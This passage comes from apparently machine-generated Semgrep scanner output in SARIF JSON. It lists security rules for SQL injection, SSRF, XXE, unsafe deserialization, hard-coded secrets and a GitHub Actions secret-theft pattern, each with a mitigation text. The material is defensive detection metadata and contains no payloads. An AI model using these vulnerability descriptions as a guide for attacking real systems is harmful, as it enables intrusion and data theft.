URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","id":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","name":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.http-request.http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint","id":"go.net.sql.pg-sqli-taint.pg-sqli-taint","name":"go.net.sql.pg-sqli-taint.pg-sqli-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.sql.pg-sqli-taint.pg-sqli-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","id":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","name":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","id":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","name":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"help":{"markdown":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf](https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf)\n","text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","id":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","name":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","id":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","name":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","id":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","name":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"help":{"markdown":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb)\n - [https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/](https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/)\n","text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization","id":"ruby.lang.security.cookie-serialization.cookie-serialization","name":"ruby.lang.security.cookie-serialization.cookie-serialization","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.cookie-serialization.cookie-serialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","id":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","name":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"help":{"markdown":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout)\n - [https://securitylab.github.com/research/github-actions-preventing-pwn-requests/](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)\n - [https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md](https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md)\n - [https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)\n","text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","id":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","name":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","id":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","name":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","id":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","name":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","id":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","name":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","id":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","name":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-dill-flask.tainted-dill-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"help":{"markdown":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open](https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open)\n","text":"Detected an unsecured transmission channel. 